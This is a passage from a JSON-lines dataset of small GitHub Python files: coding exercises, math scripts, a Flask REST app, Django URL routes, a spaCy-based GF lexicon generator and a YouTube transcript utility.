print(triplet[0] * triplet[1] * triplet[2]) # prints product from the 3 numbers in the triplet list\n exit_status = 1\n break\n b += 1\n a += 1\n \n\n","repo_name":"jakedmtr/project-euler","sub_path":"solved/problem-09.py","file_name":"problem-09.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20476374809","text":"num = (input(\"Please enter a number: \"))\nwhile True:\n try:\n number = int(num)\n break\n except ValueError:\n print(\"Input it's not an integer number, try again\")\n num = (input(\"Please enter a number: \"))\nnumber = int(num)\nbool = True\ndef VerifyPrimeNumber(number):\n if number > 1:\n for x in range(2, number):\n if (number % x) == 0:\n return (not bool)\n else:\n return bool\n else:\n (not bool)\nif (VerifyPrimeNumber(number)):\n print (number, \"It's a prime number\")\nelse: \n print (number, \"It´s not a prime number\")\n","repo_name":"CS-UTEC/tarea1-github-Alexandra-SR","sub_path":"primo.py","file_name":"primo.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42400563581","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\ndef inc(x):\r\n def incx(y):\r\n return x + y\r\n return incx\r\n\r\ninc2 = inc(2)\r\ninc5 = inc(5)\r\n\r\ndef innc(x):\r\n def innc2(y):\r\n def innc3(z):\r\n return x + y + z\r\n return innc3\r\n return innc2\r\n\r\nnum = [2,-5,9,7,-2,5,3,1,0,-3,8]\r\npositive_num = filter(lambda x:x>0,num)\r\n#average = reduce(lambda x,y:x+y,positive_num) / len(positive_num)\r\n\r\nimport numpy as np\r\nimport random\r\ndef rand10():\r\n while True:\r\n a1 = random.randint(1,7) - 1\r\n a2 = random.randint(1,7) - 1\r\n r = 7 * a1 + a2\r\n if r < 10:\r\n break\r\n return r + 1\r\n\r\nnums = []\r\nfor i in range(1000000):\r\n nums.append(rand10())\r\n\r\nfor i in range(10):\r\n print(nums.count(i+1) / len(nums))\r\n print('\\n') \r\n\r\n #Monte Carlo simulation\r\ndef circle():\r\n a = random.random() ** 2\r\n b = random.random() ** 2\r\n distance = a + b\r\n return distance ** 0.5\r\n\r\nimport time\r\nimport numpy as np\r\nimport random\r\nstart_points = time.time()\r\npoints = 0\r\nlength = 1000000000\r\nfor i in range(length):\r\n r = circle()\r\n if r < 1:\r\n if i % 1000000 == 0:\r\n print(i)\r\n points += 1\r\ncalc_pi = points * 4 / length\r\nend_points = time.time()\r\ninterval = end_points - start_points \r\nprint(calc_pi)\r\nprint(interval)","repo_name":"condoleezza/test20190321","sub_path":"justolay.py","file_name":"justolay.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28049553332","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport os\nfrom flask import Flask, request, abort, jsonify\nfrom flask import render_template, session, url_for, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_moment import Moment\n#from config import Config\nimport random\nfrom flask_cors import CORS, cross_origin\nfrom flask_migrate import Migrate\nfrom models import setup_db, Venue, Place, db\nfrom auth import AuthError, requires_auth\n\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n moment = Moment(app)\n db = SQLAlchemy(app)\n migrate = Migrate(app, db)\n #SECRET_KEY = os.urandom(32)\n CORS(app, resources={r\"/api/\": {\"origins\": \"*\"}})\n \n setup_db(app)\n\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH, POST, DELETE, OPTIONS')\n return response\n\n @app.route('/venues')\n @requires_auth('get:venues')\n def get_venues():\n venues = Venue.query.all()\n venues = [venue.format() for venue in venues]\n for venue in venues:\n venue['places'] = [i.format() for i in venue['places']]\n return jsonify(venues)\n\n @app.route('/places', methods=['GET'])\n @requires_auth('get:places')\n def get_places():\n places = Place.query.all()\n places = [place.format() for place in places]\n return jsonify(places)\n\n @app.route('/venues/create', methods=['POST'])\n @requires_auth('post:venue')\n def post_new_venue():\n body = request.get_json()\n vname = body.get('vname', None)\n description = body.get('description', None)\n venue = Venue(vname=vname, description=description)\n venue.insert()\n new_venue = Venue.query.get(venue.id)\n new_venue = new_venue.format()\n return jsonify({\n 'success': True,\n 'created': venue.id,\n 'new_venue': new_venue\n })\n\n @app.route('/places/create', methods=['POST'])\n @requires_auth('post:place')\n def post_new_place():\n body = request.get_json()\n pname = body.get('pname', None)\n pdescription = body.get('pdescription', None)\n venue_id = body.get('venue_id', None)\n place = Place(pname=pname, pdescription=pdescription,\n venue_id=venue_id)\n place.insert()\n new_place = Place.query.get(place.id)\n new_place = new_place.format()\n return jsonify({\n 'success': True,\n 'created': place.id,\n 'new_place': new_place\n })\n\n @app.route('/venues/delete/', methods=['DELETE'])\n @requires_auth('delete:venue')\n def delete_venue(venue_id):\n Venue.query.filter(Venue.id == venue_id).delete()\n db.session.commit()\n db.session.close()\n return jsonify({\n \"success\": True,\n \"message\": \"Deleted venue\"\n })\n\n @app.route('/places/delete/', methods=['DELETE'])\n @requires_auth('delete:place')\n def delete_place(place_id):\n Place.query.filter(Place.id == place_id).delete()\n db.session.commit()\n db.session.close()\n return jsonify({\n \"success\": True,\n \"message\": \"Deleted place\"\n })\n\n @app.route('/places/patch/', methods=['PATCH'])\n @requires_auth('patch:places')\n def patch_place(place_id):\n place = Place.query.filter(Place.id == place_id)\n body = request.get_json()\n pname = body.get('pname', None)\n pdescription = body.get('pdescription', None)\n venue_id = body.get('venue_id', None)\n place.pname = pname\n place.pdescription = pdescription\n place.venue_id = venue_id\n place.update()\n return jsonify({\n \"success\": True,\n \"message\": \"Place update occured\"\n })\n\n @app.route('/venues/patch/')\n @requires_auth('patch:venues')\n def patch_venue(venue_id):\n venue = Venue.query.filter(Venue.id == venue_id)\n body = request.get_json()\n vname = body.get('vname', None)\n description = body.get('description', None)\n venue.vname = vname\n venue.description = description\n venue.update()\n return jsonify({\n \"success\": True,\n \"message\": \"Venue update occured\"\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'Not Found'\n }), 404\n\n @app.errorhandler(422)\n def unprocessable_entity(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': 'Unprocessable Entity'\n })\n return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","repo_name":"Keerthanamunna/Capstoneproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74144620578","text":"import sys\nimport os\nimport argparse\n\nsys.path.append(os.path.dirname(__file__))\nimport log\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", action=\"append_const\",\n dest=\"verbose\", const=True, default=[],\n help=\"Verbose, specify twice for more verbosity\")\nconfig = parser.parse_args()\nconfig.verbose = len(config.verbose)\nconfig.verbose = config.verbose if config.verbose <=2 else 2\n\n# Set debug level early to catch package initialization outputs\nif config.verbose >= 1:\n log.Logger().add_level(log.DEBUG)\nif config.verbose >= 2:\n log.Logger().add_level(log.DEBUG2)\n\nimport chromesthesia\n\nfrom ._version import get_versions\n__version__ = get_versions()['version']\ndel get_versions\n","repo_name":"fredriklindberg/chromesthesia","sub_path":"chromesthesia_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"29289032791","text":"class Solution:\n def shortestCompletingWord(self, licensePlate, words):\n \"\"\"\n :type licensePlate: str\n :type words: List[str]\n :rtype: str\n \"\"\"\n from collections import Counter\n import re\n plate = Counter(re.findall(r'[a-z]', licensePlate.lower()))\n best = None\n for word in words:\n wc = Counter(re.findall(r'[a-z]', word.lower()))\n for k in plate:\n if plate[k] > wc.get(k, 0):\n break\n else:\n if best is None or len(best) > len(word):\n best = word\n return best\n\n\nfn = Solution().shortestCompletingWord\n\nprint(fn(licensePlate=\"1s3 PSt\", words=[\"step\", \"steps\", \"stripe\", \"stepple\"]))\nprint(fn(licensePlate=\"1s3 456\", words=[\"looks\", \"pest\", \"stew\", \"show\"]))\n","repo_name":"feigaoxyz/leetcode","sub_path":"p748_shortest_completing_word.py","file_name":"p748_shortest_completing_word.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"86582492595","text":"from django.conf.urls import url\r\n\r\nfrom api.views import news\r\nfrom api.views import auth\r\nfrom api.views import task\r\nfrom api.views import auction\r\nurlpatterns = [\r\n url(r'^message/', auth.MessageView.as_view()),\r\n url(r'^login/', auth.LoginView.as_view()),\r\n\r\n\r\n url(r'^topic/$', news.TopicView.as_view()),\r\n url(r'^news/$', news.NewsView.as_view()),\r\n url(r'^news/(?P\\d+)/$', news.NewsDetailView.as_view()),\r\n url(r'^comment/$', news.CommentView.as_view()),\r\n url(r'^favor/$', news.FavorView.as_view()),\r\n\r\n # celery示例\r\n url(r'^create/task/$', task.create_task),\r\n url(r'^get/result/$', task.get_result),\r\n\r\n # 专场列表\r\n url(r'^auction/$', auction.AuctionView.as_view()),\r\n url(r'^auction/(?P\\d+)/$', auction.AuctionDetailView.as_view()),\r\n url(r'^auction/item/(?P\\d+)/$', auction.AuctionItemDetailView.as_view()),\r\n\r\n url(r'^auction/deposit/(?P\\d+)/$', auction.AuctionDepositView.as_view()),\r\n\r\n url(r'^bid/$', auction.BidView.as_view()),\r\n\r\n\r\n url(r'^auction2/$', auction.Auction2View.as_view({'get':'list'})),\r\n url(r'^auction2/(?P\\d+)/$', auction.Auction2View.as_view({'get':'retrieve'})),\r\n]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chengkanghua/python-note","sub_path":"选修进阶/微信小程序/day10/代码和笔记/demos/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"34"} +{"seq_id":"1346278544","text":"# import tryy\n# from turtle import Turtle,Screen\n#\n# timmy = Turtle()\n# timmy.shape(\"turtle\")\n# timmy.color('coral')\n# timmy.fd(100)\n#\n# my_screen = Screen()\n# my_screen.exitonclick()\n\nfrom prettytable import PrettyTable\n\ntable = PrettyTable()\n\ntable.field_names = [\"Pokemon\", \"Type\"]\ntable.add_row(['Pikachu', 'Electric'])\ntable.add_row(['Raichu', 'Electric'])\ntable.add_row(['Bulbasar', 'Land'])\n\ntable.align = 'l'\n\nprint(table)\n","repo_name":"BinayT/Python100DOC","sub_path":"Day-16-OOP/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36756766043","text":"from utils import kivy_utils # call builder for below classes\nfrom kivy.properties import ObjectProperty, NumericProperty, ListProperty\nfrom kivy.uix.image import AsyncImage\nfrom .line_box import LineBox\nimport cv2\n\n\nclass ImPage(AsyncImage):\n\ton_double_click= []\n\n\tpage = ObjectProperty()\n\tline_box_color= ListProperty()\n\tline_width= NumericProperty()\n\tfocus_box_color= ListProperty()\n\tfade_time= NumericProperty()\n\tfade_cycles= NumericProperty(1)\n\n\tdef build(self, page, im_path, page_index):\n\t\tim = cv2.imread(im_path)\n\t\tLineBox.LINE_WIDTH= self.line_width # janky but kvlang doesnt support rules for instructions\n\n\t\tself.source=im_path\n\t\tself.size=tuple(reversed(im.shape[:2]))\n\t\tself.bind(texture= self._disable_interplotation) # Prevent blurring\n\n\t\tself.page= page\n\n\t\treturn self\n\n\tdef load_boxes(self, hidden=True):\n\t\tself.boxes= []\n\n\t\tfor bubb in self.page.bubbles:\n\t\t\tbox,lbl= LineBox(color=self.line_box_color).build(self, bubble=bubb, hidden=hidden)\n\t\t\tself.canvas.after.add(box)\n\t\t\tself.boxes.append(box)\n\t\t\tself.add_widget(lbl)\n\t\treturn self\n\n\t# click events\n\tdef on_touch_down(self, touch):\n\t\tif touch.button == \"left\" and touch.is_double_tap:\n\t\t\tfor b in self.boxes:\n\t\t\t\tx_bnds= [b.pos[0], b.pos[0]+b.size[0]]\n\t\t\t\ty_bnds= [b.pos[1], b.pos[1]+b.size[1]]\n\t\t\t\tx_bnds.sort(), y_bnds.sort()\n\n\t\t\t\tif x_bnds[0] <= touch.pos[0] <= x_bnds[1] \\\n\t\t\t\t\tand y_bnds[0] <= touch.pos[1] <= y_bnds[1]:\n\t\t\t\t\tfor func in ImPage.on_double_click: func(b)\n\n\t\treturn super().on_touch_down(touch)\n\n\t@classmethod\n\tdef _disable_interplotation(cls, image, texture):\n\t\tif not texture: return\n\t\timage.texture.min_filter = 'nearest'\n\t\timage.texture.mag_filter = 'nearest'","repo_name":"LiteralGenie/TranslationThingy","sub_path":"classes/im_page.py","file_name":"im_page.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22066154143","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef show_samples_v0(samples_array, colors_array):\n for samples, colors in zip(samples_array, colors_array):\n plt.scatter(samples[0, :], samples[1, :], color=colors)\n\n\ndef concatenate_samples(samples_array):\n result = samples_array[0]\n for i in range(1, len(samples_array)):\n result = np.concatenate((result, samples_array[i]), axis=1)\n return result\n\n\ndef get_classification_error_from_class_nums(y_pred, y_test):\n\n N0 = np.sum(y_test == 0)\n N1 = np.sum(y_test == 1)\n p0_count = 0\n p1_count = 0\n y_pred = np.ravel(y_pred)\n\n for test_class_num, pred_class_num in zip(y_test, y_pred):\n\n if [test_class_num, pred_class_num] == [0, 1]:\n p0_count += 1\n\n if [test_class_num, pred_class_num] == [1, 0]:\n p1_count += 1\n\n return p0_count / N0, p1_count / N1\n\n\ndef get_euclid_dist(x, y):\n x = x.reshape(2, )\n y = y.reshape(2, )\n return np.linalg.norm(x - y)\n\n\ndef get_sum_distance(distances_array):\n distance = 0\n for distances in distances_array:\n distance += sum(distances)\n return distance\n\n\ndef show_vector_points(X, color='red'):\n for x in X:\n plt.scatter(x[0], x[1], color=color)\n\n\ndef show_vector_points_v1(X, color='red'):\n plt.scatter(X[0, :], X[1, :], color=color)\n\n\ndef get_s(samples, min_indexes, K):\n classes = [[] for _ in range(K)]\n for i, cls in np.ndenumerate(min_indexes):\n classes[cls].append(samples[0:2, i])\n\n for k in range(K):\n classes[k] = np.array(classes[k])\n\n return classes\n\n\ndef merge_classes(samples_set):\n result = samples_set[0]\n for i in range(1, len(samples_set)):\n result = np.concatenate((result, samples_set[i]), axis=1)\n return result\n","repo_name":"SobolevD/mro1","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6853187229","text":"import spacy\nimport re\nimport itertools\nimport functools\nimport sys\nfrom collections import defaultdict\n\nnlp = spacy.load(\"en_core_web_sm\")\n\nposDict = defaultdict(lambda: \"NOT FOUND\")\nposDict[\"NOUN\"] = \"N\"\nposDict[\"VERB\"] = \"V\"\nposDict[\"ADJ\"] = \"A\"\nposDict[\"ADV\"] = \"Adv\"\n# posDict[\"DET\"] = \"Det\"\n# posDict[\"PRON\"] = \"Pron\"\nposDict[\"CCONJ\"] = \"Conj\"\nposDict[\"SCONJ\"] = \"Subj\"\nposDict[\"PUNCT\"] = \"PN\"\nposDict[\"ADP\"] = \"Prep\"\nposDict[\"PROPN\"] = \"PN\"\n\ndef allowed_pos(pos):\n return posDict[pos] not in [\"NOT FOUND\"]\n\nillegal = '!\"#$%&\\'()*+, -./:;<=>?@[\\]^`{|}~\\\\§–'\nillegal_ = '!\"#$%&\\'()*+, -./:;<=>?@[\\]^`{|}~\\\\§–_'\n\ndef get_words(line):\n def replace_var(str):\n if str[:2] == '@(':\n return \"it\"\n else:\n return str\n\n return \" \".join([replace_var(w) for w in line.split()])\n\ndef removeIllegal(str):\n return ''.join([l for l in str if l not in illegal])\n\ndef mkConstructor(pos, linlem):\n if pos in ['A', 'V', 'N', 'PN', 'Prep', 'Conj', 'Adv', 'Subj']:\n return 'mk%s \"%s\"' % (pos, linlem)\n else:\n inner = '(mk%s \"%s\")' % (pos[0], linlem)\n return 'mk%s %s' % (pos, inner)\n\n\ndef getBasic(t):\n lemmas = [t.lemma_]\n return getAny(lemmas, posDict[t.pos_])\n\ndef getAny(lemmas, pos, prep0=None):\n linlem = ' '.join(lemmas) # if compound\n if linlem == '\"':\n return None # TODO: why is this even getting this far?\n funlem = '_'.join([removeIllegal(l) for l in lemmas])\n if prep0:\n prep = '(mkPrep \"%s\")' % (prep0)\n fun = '_%s_%s_%s' % (funlem, removeIllegal(prep0), pos)\n # inner = 'mk%s \"%s\"' % (pos[0], linlem) # first character of POS = intransitive\n # lin = 'lin %s = mk%s (%s) %s' % (fun, pos, inner, prep)\n else:\n prep = ''\n fun = '_%s_%s' % (funlem, pos)\n\n lin = 'lin %s = %s %s' % (fun, mkConstructor(pos, linlem), prep)\n # Result is the pos, fun and lin\n # but in a list, because in case of PN, we try alternative version\n result = [(pos, fun, lin)]\n if pos=='PN':\n alternative = getAny(lemmas, \"N\")\n return result+alternative\n else:\n return result\n\ndef getVerb(t, pos, prep0='because'):\n lemmas = [t.lemma_]\n if prep0 == 'because':\n return getAny(lemmas,pos)\n else:\n return getAny(lemmas, pos, prep0)\n\ndef getCmpnd(t1, t2):\n lemmas = [t1.lemma_, t2.lemma_]\n return getAny(lemmas, posDict[t2.pos_])\n\ndef checkSubChild(dep, ls):\n return any(child[2] == dep for child in ls)\n\ndef checkSubChildTwo(dep1, dep2, ls):\n return all(any(child[2] == dep for child in ls) for dep in [dep1, dep2])\n\ndef getSubChild(dep, ls):\n return [child[0] for child in ls if child[2] == dep]\n\ndef checkWhichVerb(t):\n childList = [[child.lemma_, child.pos_, child.dep_] for child in t.children]\n if t.lemma_ == \"be\":\n return []\n elif checkSubChildTwo(\"xcomp\", \"obj\", childList):\n# print(t.lemma_, childList)\n for child in childList:\n if child[1] == \"ADJ\" and child[2] == \"xcomp\":\n return (getVerb(t, \"V2A\"))\n elif child[1] == \"VERB\" and child[2] == \"xcomp\":\n return (getVerb(t, \"V2V\"))\n elif checkSubChild(\"prep\", childList):\n prep = getSubChild(\"prep\", childList)[0]\n return (getVerb(t, \"V2\", prep))\n\n elif checkSubChildTwo(\"ccomp\", \"obj\", childList):\n return (wogetVerb(t, \"V2S\"))\n elif checkSubChild(\"dobj\", childList):\n if checkSubChild(\"iobj\", childList):\n return (getVerb(t, \"V3\"))\n else:\n return (getVerb(t, \"V2\"))\n # also for adjectival complement\n # https://universaldependencies.org/fi/dep/xcomp.html\n elif checkSubChild(\"xcomp\", childList):\n for child in childList:\n if child[1] == \"ADJ\":\n return (getVerb(t, \"VA\"))\n elif child[1] == \"VERB\":\n return (getVerb(t, \"VV\"))\n elif checkSubChild(\"ccomp\", childList):\n return (getVerb(t, \"VS\"))\n else:\n print(\"*** VERB HAS CHILD BUT NOT LISTED\", t, \" :\", t.lemma_, t.pos_, t.morph, childList)\n return (getBasic(t))\n\ndef hasChild(t):\n return any(True for _ in t.children)\n\ndef get_toks(line):\n txt = get_words(line)\n doc = nlp(txt)\n\n words = []\n tok = enumerate(doc)\n\n for i, t in tok:\n if allowed_pos(t.pos_):\n #print(t, \" :\", t.lemma_, t.pos_, t.morph, t.dep_)\n if t.pos_ == \"VERB\" and hasChild(t):\n words += checkWhichVerb(t)\n elif t.dep_ == \"compound\":\n t2 = doc[i + 1]\n if allowed_pos(posDict[t2.pos_]):\n words += getCmpnd(doc[i], doc[i + 1])\n next(tok)\n else:\n pass\n elif t.lemma_ == \"-\":\n if allowed_pos(doc[i + 1]):\n words += getCmpnd(doc[i-1], doc[i + 1])\n next(tok)\n else:\n pass\n elif all([l in illegal_ for l in t.lemma_]):\n print(\"Word is illegal\", t)\n pass\n else:\n #print(\"word :\", getBasic(doc[i]))\n words += getBasic(t)\n else:\n print(\"ignored\", t, \":\", t.lemma_, t.pos_)\n pass\n return [w for w in words if w]\n\ndef absheader(name):\n return \"abstract %s = Cat [A, N, CN, V, VV, V2, VS, V2S, VA, V2A, PN, AdA, Adv, Prep, Pron, Conj, Subj] ** {\\n fun\\n\" % (name)\n\ndef cncheader(name, cnc):\n header = [\n \"concrete %s%s of %s = Cat%s [A, N, CN, V, VV, V2, VS, V2S, VA, V2A, PN, AdA, Adv, Prep, Pron, Conj, Subj] ** \" % (name, cnc, name, cnc)\n , \" open Paradigms%s, Prelude in {\" % (cnc)\n , \"\"\n , \"oper mkSubj : Str -> Subj = \\s -> lin Subj (ss s) ;\"\n ]\n return \"\\n\".join(header)\n\nif __name__ == \"__main__\":\n\n absname = sys.argv[1]\n cncname = \"Eng\"\n absfile = absname + \".gf\"\n cncfile = absname + cncname + \".gf\"\n corpus = sys.argv[2]\n\n with open(corpus, \"r\") as corpusfile:\n corpus = corpusfile.read().split(\"\\n\")\n\n words = []\n for line in corpus:\n words += get_toks(line)\n\n with open(absfile, \"w\") as abstract:\n with open(cncfile, \"w\") as concrete:\n abstract.write(absheader(absname))\n concrete.write(cncheader(absname, cncname))\n for pos, fun, lin in set(words):\n abstract.write(\" %s : %s ;\\n\" % (fun, pos))\n concrete.write(\" %s ;\\n\" % (lin))\n abstract.write(\"}\")\n concrete.write(\"}\")\n print(\"Created %s and %s\" % (absfile, cncfile))","repo_name":"smucclaw/sandbox","sub_path":"inari/scasp/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"40410062987","text":"\"\"\"\nTried to do it in recursion but it is very slow compare to solution one and\ntwo. Thought from leetcode discussion\n\"\"\"\n\n\nclass Solution:\n def valid_palindrome(self, s: str) -> bool:\n return self.is_palindrome(0, len(s) - 1, s, True)\n\n def is_palindrome(self, i, r, s, skip):\n # stop when l is greater or equal to r\n if i >= r:\n return True\n\n # if left character is equal to right character, go to the next\n # characters\n if s[i] == s[r]:\n return True and self.is_palindrome(i + 1, r - 1, s, skip)\n elif not skip:\n # if the characters are not the same, and we have already skipped\n # a character, return false\n return False\n else:\n # if te characters are not the same, but we haven't skipped a\n # character, try to skip the left character or the right character\n return self.is_palindrome(i + 1, r, s, False) or self.is_palindrome(\n i,\n r - 1,\n s,\n False,\n )\n","repo_name":"asxzhy/Leetcode","sub_path":"leetcode/question_680/solution_3.py","file_name":"solution_3.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12818437171","text":"# Question: Complete the script so that it removes duplicate items from list a .\n#\n# a = [\"1\", 1, \"1\", 2]-- \"1 is duplicate here\"\n# Expected output:\n#\n# ['1', 2, 1]\n\n# ********************Diifferent Approach***********************\n\n# a = [\"1\",1,\"1\",2]\n# b = []\n# for i in a:\n# if i not in b:\n# b.append(i)\n# print(list(set(a)))\n\n# ********************Diifferent Approach***********************\n\nfrom collections import OrderedDict\na = [\"1\", 1, \"1\", 2]\na = list(OrderedDict.fromkeys(a))\nprint(a)\n\n\n","repo_name":"SagarikaNagpal/Python-Practice","sub_path":"QuesOnOops/Removing_Duplicates.py","file_name":"Removing_Duplicates.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7990495023","text":"def str_reverse(string):\n\tresult = ''\n\tfor ch in reversed(string):\n\t\tresult += ch\n\n\treturn result\n\nprint(\"=== Test str_reverse function ===\")\nprint(str_reverse(\"Anton\"))\n\ndef join(delimiter, items):\n\tresult = \"\"\n\tfor item in items:\n\t\tresult += item + delimiter\n\n\treturn result\nprint(\"=== Test join function ===\")\nprint(join(\" \", [\"Radoslav\", \"Yordanov\", \"Georgiev\"]))\nprint(join(\"\\n\", [\"line1\", \"line2\"]))\n\ndef startswith(search, string):\n\tfor i in range(0, len(search)):\n\t\tif search[i] != string[i]:\n\t\t\treturn False\n\t\treturn True\n\nprint(\"=== Test startswith function ===\")\nprint(startswith(\"Py\", \"Python\"))\nprint(startswith(\"py\", \"Python\"))\nprint(startswith(\"baba\", \"asdbaba\"))\n\ndef endswith(search, string):\n\tstart = len(string) - len(search)\n\tfor i in range(start, len(string)):\n\t\tif search[i - start] != string[i]:\n\t\t\treturn False\n\t\treturn True\n\nprint(\"=== Test endswith function ===\")\nprint(endswith(\".py\", \"hello.py\"))\nprint(endswith(\"kapak\", \"babakapak\"))\nprint(endswith(\" \", \"Python \"))\nprint(endswith(\"py\", \"python\"))\n\ndef trim(string):\n\tresult = \"\"\n\tinline = False\n\tif string[0] != \" \":\n\t\tinline = True\n\n\tfor ch in range(0, len(string) - 1):\n\t\tif inline:\n\t\t\tif string[ch] != \" \":\n\t\t\t\tresult += string[ch]\n\t\t\telif string[ch] == \" \" and string[ch + 1] != \" \":\n\t\t\t\tresult += string[ch]\n\t\telse:\n\t\t\tif string[ch] != \" \":\n\t\t\t\tresult += string[ch]\n\t\t\t\tinline = True\n\tif string[len(string) - 1] != \" \":\n\t\tresult += string[len(string) - 1]\n\treturn result\n\nprint(\"=== Test trim function ===\")\nprint(trim(\" asda \"))\nprint(trim(\" spacious \"))\nprint(trim(\"no here but yes at end \"))\nprint(trim(\" \"))\nprint(trim(\"python\"))","repo_name":"adutev/Programming-0","sub_path":"week6/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37001480595","text":"def main():\n N = int(input())\n nums = {}\n for _ in range(N):\n n = int(input())\n try:\n nums[n] += 1\n except KeyError:\n nums[n] = 1\n print(max(nums.values()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TopGun1405/BaekJoonOJ-Python","sub_path":"BOJ_N-9500-9999/BOJ_N-9913.py","file_name":"BOJ_N-9913.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71221186659","text":"from itertools import count\n\nif __name__ == \"__main__\":\n\n with open(\"input.txt\") as fh:\n splits = fh.read().strip().split()\n x_range = splits[2].split(\"=\")[1][:-1]\n y_range = splits[3].split(\"=\")[1]\n min_x, max_x = (int(n) for n in x_range.split(\"..\"))\n min_y, max_y = (int(n) for n in y_range.split(\"..\"))\n\n best, count = 0, 0\n for tx in range(0, max_x+1):\n for ty in range(min_y, -min_y):\n x, y, h = 0, 0, 0\n vx, vy = tx, ty\n while y > min_y:\n x, y, h = x + vx, y + vy, max(h, y)\n vx, vy = max(0, vx-1), vy - 1\n if min_x <= x <= max_x and min_y <= y <= max_y:\n count += 1\n best = max(best, h)\n break\n\n print(\"Part 1: %d\" % best)\n print(\"Part 2: %d\" % count)\n\n","repo_name":"LiquidityC/aoc","sub_path":"2021/day_17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43184327229","text":"\"\"\"Game. Find the greatest common divisor.\"\"\"\nfrom random import randint\n\nfrom brain_games.scripts import brain_core as sc\n\nSTART_RANGE = 1\nEND_RANGE = 100\n\n\ndef calculation(num_a, num_b):\n \"\"\"Find the greatest common divisor of given numbers.\n\n Args:\n num_a: First number.\n num_b: Second number.\n\n Returns:\n Greatest common divisor of given numbers.\n \"\"\"\n if num_a == 0 or num_b == 0:\n return max(num_a, num_b)\n elif num_a >= num_b:\n return calculation(num_a % num_b, num_b)\n elif num_b >= num_a:\n return calculation(num_a, num_b % num_a)\n\n\ndef statement_generation():\n \"\"\"Statement of the task condition.\n\n Returns:\n question_arg: Random number.\n correct_answer: True if prime else False.\n \"\"\"\n number_one = randint(START_RANGE, END_RANGE) # noqa:S311\n number_two = randint(START_RANGE, END_RANGE) # noqa:S311\n correct_answer = str(calculation(number_one, number_two))\n question_arg = '{0} {1}'.format(number_one, number_two)\n return question_arg, correct_answer\n\n\ndef main():\n \"\"\"Game flow.\"\"\"\n rules = 'Find the greatest common divisor of given numbers.'\n name = sc.welcome(rules)\n sc.game_flow(name, statement_generation)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"korolkevich/python-project-lvl1","sub_path":"brain_games/scripts/brain_gcd.py","file_name":"brain_gcd.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6620881656","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 10 13:21:31 2020\n\n@author: B Bartschi\n\"\"\"\n\nfrom youtube_transcript_api import YouTubeTranscriptApi\nimport random \n\ndef find_clip_info_from_phrase(phrase, word_mapping, use_random_version=True, specified_versions=[]):\n \"\"\"\n Takes in a phrase and finds times within videos when words are said.\n \n Parameter:\n phrase (string): the input phrase to search for\n word_mapping (dict): keys are individual words that map to a a list of transcript phrase.\n For example {'trajectory' : [{'video': 